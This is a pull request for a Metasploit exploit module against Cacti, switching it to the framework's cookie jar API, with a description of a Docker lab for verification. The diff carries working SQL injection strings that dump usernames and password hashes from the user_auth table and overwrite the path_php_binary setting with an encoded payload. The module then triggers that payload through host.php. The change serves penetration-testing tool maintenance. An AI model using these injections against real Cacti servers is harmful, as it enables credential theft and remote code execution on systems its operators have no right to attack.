### PR TITLE
Update cacti rce to use cookie jar api

### DIFF
--- a/modules/exploits/unix/http/cacti_filter_sqli_rce.rb
+++ b/modules/exploits/unix/http/cacti_filter_sqli_rce.rb
@@ -86,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     begin
-      cookie = login
+      login
 
       # optionally grab the un/pass fields for all users.  While we're already admin, cred stuffing...
       if datastore['CREDS']
         # https://user-images.githubusercontent.com/23179648/84865521-a213eb80-b078-11ea-985f-f994d3409c72.png
         print_status('Dumping creds')
-        res = inject(cookie, "')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
+        res = inject("')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;")
         res.body.split.each do |cred|
           /"(?<username>[^"]+)","(?<hash>[^"]+)"/ =~ cred
           next unless hash
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       print_status('Backing-up path_php_binary value')
-      res = inject(cookie, "')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")
+      res = inject("')+UNION+SELECT+1,value,3,4,5,6,7+from+settings+where+name='path_php_binary';")
 
       # return value:
       # "name","hex"
@@ -121,12 +121,12 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status('Uploading payload')
       pload = Rex::Text.uri_encode(payload.encoded)
       begin
-        inject(cookie, "')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
+        inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{pload}'+where+name='path_php_binary';")
 
         print_status('Triggering payload')
         send_request_cgi(
           'uri' => normalize_uri(target_uri.path, 'host.php'),
-          'cookie' => cookie,
+          'keep_cookies' => true,
           'vars_get' => {
             'action' => 'reindex'
           }
@@ -140,9 +140,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def login
+    cookie_jar.clear
+
     print_status('Grabbing CSRF')
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'index.php')
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'keep_cookies' => true
     )
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
@@ -152,13 +155,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_good("CSRF: #{csrf}")
 
-    cookie = res.get_cookies
-
     print_status('Attempting login')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'index.php'),
       'method' => 'POST',
-      'cookie' => cookie,
+      'keep_cookies' => true,
       'vars_post' => {
         'login_username' => datastore['USERNAME'],
         'login_password' => datastore['PASSWORD'],
@@ -170,13 +171,14 @@ class MetasploitModule < Msf::Exploit::Remote
     if res && res.code != 302
       fail_with(Failure::NoAccess, "#{peer} - Invalid credentials (response code: #{res.code})")
     end
-    cookie
+
+    res
   end
 
-  def inject(cookie, content)
-    res = send_request_raw(
+  def inject(content)
+    res = send_request_cgi(
       'uri' => "#{normalize_uri(target_uri.path, 'color.php')}?action=export&header=false&filter=1#{content}--+-",
-      'cookie' => cookie
+      'keep_cookies' => true
     )
 
     if res && res.code != 200
@@ -187,9 +189,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def resetsqli(php_binary)
     print_status('Cleaning up environment')
-    cookie = login # any request with our cookie now dont get a response, so we'll need to login a 2nd time to reset our value correctly
+    login # any request with our cookie now dont get a response, so we'll need to login a 2nd time to reset our value correctly
     print_status('Resetting DB Value')
-    inject(cookie, "')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{php_binary}'+where+name='path_php_binary';")
+    inject("')+UNION+SELECT+1,2,3,4,5,6,7;update+settings+set+value='#{php_binary}'+where+name='path_php_binary';")
   end
 
   def report_cred(opts)


### PR DESCRIPTION
***Note, the final PR will need to be rebased against master to work, this PR is just the final commit which assumes it has master's changes included***

Updating https://github.com/rapid7/metasploit-framework/pull/15122 to make use of the cookie jar functionality delivered as part of https://github.com/rapid7/metasploit-framework/pull/14831

## Verification

Running the application with Docker:

```shell
git clone https://github.com/scline/docker-cacti.git
cd docker-cacti

rm -rf cacti
git checkout 1.2.11 -- cacti
cp ./docker-compose/cacti_testing.yml ./docker-compose.yml
sudo docker-compose up
```

Navigate to `localhost:80` and login with `admin:admin` and run through the install steps.

I also installed nc to make life easier with the default payload options:

```
sudo docker-compose exec cacti /bin/bash
yum install nc
```